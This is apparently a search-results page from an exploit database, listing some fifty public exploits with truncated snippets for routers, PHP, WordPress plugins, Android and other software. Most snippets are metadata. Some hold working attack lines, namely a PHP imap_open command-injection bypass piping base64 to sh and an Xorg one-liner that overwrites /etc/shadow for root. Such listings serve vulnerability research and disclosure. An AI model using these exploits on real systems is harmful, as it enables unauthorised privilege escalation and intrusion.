41207 matches found
PHP 5.2.3 imap (Debian Based) - imap_open Disable Functions Bypass
PHP 5.2.3 imap Debian Based - imapopen Disable Functions Bypass /tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...
xorg-x11-server 1.20.3 - Local Privilege Escalation
xorg-x11-server 1.20.3 - Local Privilege Escalation CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. BSD and any other Xorg desktop also affected...
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
Airties AIR5342 1.0.0.18 - Cross-Site Scripting Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting Date: 25-09-2018 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.airties.com/ Software http://www.airties.com.tr/support/dcenter/ Version: 1.0.0.18 Affected products: AIR534...
Skia - Heap Overflow in SkScan::FillPath due to Precision Error
Skia - Heap Overflow in SkScan::FillPath due to Precision Error There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached...
Microhard Systems 3G4G Cellular Ethernet and Serial Gateway - Default Credentials
Microhard Systems 3G4G Cellular Ethernet and Serial Gateway - Default Credentials Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials Vendor: Microhard Systems Inc. Product web page: http://www.microhardcorp.com Affected version: IPn4G 1.1.0 build 1098 IPn3Gb 2.2.0...
ntp 4.2.8p11 - Local Buffer Overflow (PoC)
ntp 4.2.8p11 - Local Buffer Overflow PoC Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow Date: 2018-06-06 Exploit Author: Fakhri Zulkifli @d0lph1n98 Vendor Homepage: http://www.ntp.org/ Software Link: http://www.ntp.org/downloads.html Version: 4.2.8p11 and earlier Tested on: 4.2.8p11...
Jenkins Mailer Plugin 1.20 - Cross-Site Request Forgery (Send Email)
Jenkins Mailer Plugin 1.20 - Cross-Site Request Forgery Send Email Exploit Title : Jenkins mailer plugin \ '+table'covermessage'+'' s = smtplib.SMTPtable'smtpserver' s.starttls s.logintable'lid', table'lpw' s.sendmailmsg'From', msg'To', msg.asstring def urlset : url...
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass Date: 04/03/2018 Exploit Author: Noman Riffat Vendor Homepage: http://www.fiberhome.com/ CVE : CVE-2018-9248, CVE-2018-9248 The vulnerability exists in plain text & hard...
Bravo Tejari Web Portal - Cross-Site Request Forgery
Bravo Tejari Web Portal - Cross-Site Request Forgery Exploit Title: Bravo Tejari Web Portal-CSRF CVE-ID: CVE-2018-7216 Vulnerability Type: Cross Site Request Forgery CSRF Vendor of Product: Tejari Affected Product Code Base: Bravo Solution Affected Component: Web Interface Management. Attack Type...
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection Dork: N/A Date: 16.02.2018 Vendor Homepage: http://neojoomla.com/ Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/...
gps-server.net GPS Tracking Software 3.1 - Multiple Vulnerabilities
gps-server.net GPS Tracking Software 3.1 - Multiple Vulnerabilities Exploit Title: GPS-SERVER.NET SAAS CMS Unfortunately each and every POST request in the CMS is going through function mysqlrealescapestring which will add slashes behind every quote in the payload. So you have to make sure your...
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow (PoC)
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow PoC CONVISO-17-002 - Zoom Linux Client Stack-based Buffer Overflow Vulnerability 1. Advisory Information Conviso Advisory ID: CONVISO-17-002 CVE ID: CVE-2017-15048 CVSS v2: 6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P Date: 2017-10-01 2. Affected...
Debut Embedded HTTPd 1.20 - Denial of Service
Debut Embedded HTTPd 1.20 - Denial of Service Exploit Title: Remote un-authenticated DoS in Debut embedded httpd server in Brother printers Date: 11/02/2017 Exploit Author: z00n @0xz00n Vendor Homepage: http://www.brother-usa.com Version: = 1.20 CVE : CVE-2017-16249 Description: The Debut embedde...
Shareet - photo SQL Injection
Shareet - photo SQL Injection Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection Dork: N/A Date: 30.10.2017 Vendor Homepage: https://odallated.com/ Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network Demo: https://odallated.com/shareet/demo/...
OpenText Documentum Content Server - Arbitrary File Download
OpenText Documentum Content Server - Arbitrary File Download !/usr/bin/env python Opentext Documentum Content Server formerly known as EMC Documentum Content Server contains following design gap, which allows authenticated user to download arbitrary content files regardless attacker's repository...
WordPress Plugin Content Timeline - SQL Injection
WordPress Plugin Content Timeline - SQL Injection Exploit Title: Multiple Blind SQL Injections Wordpress Plugin: Content Timeline Google Dork: - Date: September 16, 2017 Exploit Author: Jeroen - ITNerdbox Vendor Homepage: http://www.shindiristudio.com/ Software Link:...
Docker Daemon - Unprotected TCP Socket
Docker Daemon - Unprotected TCP Socket Exploit Title: Docker Daemon - Unprotected TCP Socket Date: 20-07-2017 Exploit Author: Martin Pizala Vendor Homepage: https://www.docker.com Software Link: https://www.docker.com/get-docker Version: Since 0.4.7 2013-06-28 feature: mount host directories Test...
Pelco SarixSpectra Cameras - Cross-Site Request Forgery Cross-Site Scripting
Pelco SarixSpectra Cameras - Cross-Site Request Forgery Cross-Site Scripting Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 Firmware: 2.1.2.0.8280-A0...
Disk Pulse 9.7.26 - Add Directory Local Buffer Overflow
Disk Pulse 9.7.26 - Add Directory Local Buffer Overflow !/usr/bin/python Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow Date: 12-06-2017 Exploit Author: abatchy17 -- @abatchy17 Vulnerable Software: Disk Pulse v9.7.26 Freeware, Pro, Ultimate Vendor Homepage:...
Moxa MX AOPC-Server 1.5 - XML External Entity Injection
Moxa MX AOPC-Server 1.5 - XML External Entity Injection + Credits: John Page AKA HYP3RLINX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ============ www.moxa.com Product:...
Bluecoat ASG 6.6CAS 1.3 - OS Command Injection (Metasploit)
Bluecoat ASG 6.6CAS 1.3 - OS Command Injection Metasploit Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS Date: April 3, 2017 Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd Contact: chrisdhebertatgmail.com Vendor Security Advisory:...
WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery
WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery !-- Source: https://sumofpwn.nl/advisory/2016/crosssiterequestforgeryinfilemanagerwordpressplugin.html Abstract A Cross-Site Request Forgery CSRF vulnerability was found in the File Manager WordPress Plugin. Among others, this issue...
F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure
F5 BIG-IP SSL Virtual Server - Ticketbleed Memory Disclosure / Exploit Title: Ticketbleed CVE-2016-9244 F5 BIG-IP SSL virtual server Memory Leakage Date: 10.02.2017 Exploit Author: Ege Balcı Vendor Homepage: https://f5.com/ Version: 12.0.0 - 12.1.2 && 11.4.0 - 11.6.1 Tested on: Multiple CVE :...
Google Android - WifiNative::setHotlist Stack Overflow
Google Android - WifiNative::setHotlist Stack Overflow Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958 The following code in frameworks/opt/net/wifi/service/jni/comandroidserverwifiWifiNative.cpp doesn't validate the parameter params.numbssid, and then copies that number of...
Adobe Connect 9.5.7 - Cross-Site Scripting
Adobe Connect 9.5.7 - Cross-Site Scripting Document Title: =============== Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1838 Security ID: PSIRT-5180 Bulletin:...
SPIP 3.1.13.1.2 - File Enumeration Path Traversal
SPIP 3.1.13.1.2 - File Enumeration Path Traversal SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal CVE-2016-7982 Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software,...
MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities
MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities Security Advisory -- Multiple Vulnerabilities - MuM Map Edit Product Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH Product: MapEdit Affected software version: 3.2.6.0 MuM MapEdit provides geodata to the internet and...
Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting
Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting Document Title: =============== Django CMS v3.3.0 - Editor Snippet Persistent Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1869 Security Release:...
Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities
Hyperoptic Tilgin Router HG23xx - Multiple Vulnerabilities Hyperoptic Tilgin Router HG23xx Multiple XSS And CSRF Vulnerabilities Vendor: Hyperoptic Ltd. | Tilgin AB Product web page: http://www.hyperoptic.com http://www.tilgin.com Affected version: HG2330, HG2302 and HG2301 Summary: Tilgin's HG23...
Google Android Broadcom Wi-Fi Driver - Memory Corruption
Google Android Broadcom Wi-Fi Driver - Memory Corruption / Copyright C 2016 by AbdSec Core Team This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, ...
IPFire 2.19 Core Update 101 - Remote Command Execution
IPFire 2.19 Core Update 101 - Remote Command Execution Exploit Title: IPFire 2.19 Update Core 101 XSS to CSRF to Remote Command Execution Date: 04/05/2016 Author: Yann CAM @ Synetis - ASafety Vendor or Software Link: www.ipfire.org Version: lesser-than 2.19 Core Update 101 Category: Remote Comman...
CMS Made Simple 1.12.1 2.1.3 - Web Server Cache Poisoning
CMS Made Simple 1.12.1 2.1.3 - Web Server Cache Poisoning ============================================= Web Server Cache Poisoning in CMS Made Simple ============================================= CVE-2016-2784 Product Description =================== CMS Made Simple is a great tool with many plugi...
GE Industrial Solutions UPS SNMP Adapter 4.8 - Multiple Vulnerabilities
GE Industrial Solutions UPS SNMP Adapter 4.8 - Multiple Vulnerabilities Exploit Title: GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: http://www.geindustrial.com/ Versions...
Skybox Platform 7.0.611 - Multiple Vulnerabilities
Skybox Platform 7.0.611 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: Skybox Platform vulnerable version: =7.0.611 fixed version: 7.5.401 CVE number: impac...
NetUSB - Kernel Stack Buffer Overflow
NetUSB - Kernel Stack Buffer Overflow !/usr/bin/env python -- coding: utf-8 -- Exploit Title: NetUSB Kernel Stack Buffer Overflow Date: 9/10/15 Exploit Author: Adrian Ruiz Bermudo Vendor Homepage: http://www.kcodes.com/ Version: Multiple:...
Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection
Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface Date: 01/09/2015 Exploit Author: neom22 Vendor Homepage: http://us.boschsecurity.com Data Sheet:...
Mango Automation 2.6.0 - Multiple Vulnerabilities
Mango Automation 2.6.0 - Multiple Vulnerabilities Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution Vendor: Infinite Automation Systems Inc. Product web page: http://www.infiniteautomation.com/ Affected version: 2.5.2 and 2.6.0 beta build 327 Summary: Mango Automation is a...
PHP 5.5.9 - zend_executor_globals CGIMode FPM WriteProcMemFile disable_functions Bypass Load Dynamic Library
PHP 5.5.9 - zendexecutorglobals CGIMode FPM WriteProcMemFile disablefunctions Bypass Load Dynamic Library ?php // EDB Note: Paper https://www.exploit-db.com/docs/english/38104-shoot-zendexecutorglobals-to-bypass-php-disablefunctions.pdf errorreporting0x66778899; settimelimit0x41424344;...
NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
NETGEAR Wireless Management System 2.1.4.15 Build 1236 - Privilege Escalation NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation. WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15 Build 1236. - Vulnerability Information:...
Wolf CMS - Arbitrary File Upload Execution
Wolf CMS - Arbitrary File Upload Execution Exploit Title : Wolf CMS 0.8.2 Arbitrary File Upload To Command Execution Reported Date : 05-May-2015 Fixed Date : 10-August-2015 Exploit Author : Narendra Bhati CVE ID : CVE-2015-6567 , CVE-2015-6568 Contact: Facebook :...
Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness
Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness """ For testing purposes only. c Yong Chuan, Koh 2014 """ from time import sleep from socket import from struct import from random import import sys, os, argparse HOST = None PORT = 623 bufsize = 1024 recv = "" create socket UDPsock =...
Nexus 5 Android 5.0 - Local Privilege Escalation
Nexus 5 Android 5.0 - Local Privilege Escalation / CVE-2014-4322 exploit for Nexus Android 5.0 author: retme [email protected] website: retme.net The exploit must be excuted as system privilege and specific SELinux context. If exploit successed,you will gain root privilege and "kernel" SELinux...
OpenEMR 4.1.2(7) - Multiple SQL Injections
OpenEMR 4.1.27 - Multiple SQL Injections Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR CVE: CVE-2014-5462 Vendor: OpenEMR Product: OpenEMR Affected version: 4.1.27 and earlier Fixed version: N/A Reported by: Jerzy Kramarz Details: SQL injection has been found and confirmed...
tnftp (FreeBSD 8910) - tnftp Client Side
tnftp FreeBSD 8910 - tnftp Client Side !/usr/bin/env python2 Exploit Title: tnftp BSD exploit Date: 11/29/2014 Exploit Author: dash Vendor Homepage: www.freebsd.org Version: FreeBSD 8/9/10 Tested on: FreeBSD 9.3 CVE : CVE-2014-8517 tnftp exploit CVE-2014-8517tested against freebsd 9.3...
tcpdump 4.6.2 - Geonet Decoder Denial of Service
tcpdump 4.6.2 - Geonet Decoder Denial of Service CVE-2014-8768 tcpdump denial of service in verbose mode using malformed Geonet payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or...
WordPress Plugin CM Download Manager 2.0.0 - Code Injection
WordPress Plugin CM Download Manager 2.0.0 - Code Injection Vulnerability title: Code Injection in Wordpress CM Download Manager plugin 2.0.0 CVE: CVE-2014-8877 Plugin: CM Download Manager plugin Vendor: CreativeMinds - https://www.cminds.com/ Link download:...
ACME micro_httpd - Denial of Service
ACME microhttpd - Denial of Service """ Exploit Title: Buffer Overflow in microhttpd by ACME Date: 4/7/2014 Exploit Author: Yuval tisf Nativ Vendor Homepage: http://www.acme.com/software/microhttpd/ Software Link: http://www.acme.com/software/microhttpd/ Version: June 2012 CVE: CVE-2014-4927 Test...
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20 November 2012 Exploit Author: [email protected] a.k.a. [email protected] Vendor Homepage:...
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion
WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Path Traversal/Remote Code Execution product: WD Arkeia Virtual Appliance AVA vulnerable version: All Arkeia...
SpagoBI 4.0 - Privilege Escalation
SpagoBI 4.0 - Privilege Escalation 01. Advisory Information Title: Remote Privilege Escalation in SpagoBI Date published: 2013-02-28 Date of last update: 2013-02-28 Vendors contacted: Engineering Group Discovered by: Christian Catalano Severity: High 02. Vulnerability Information CVE reference:...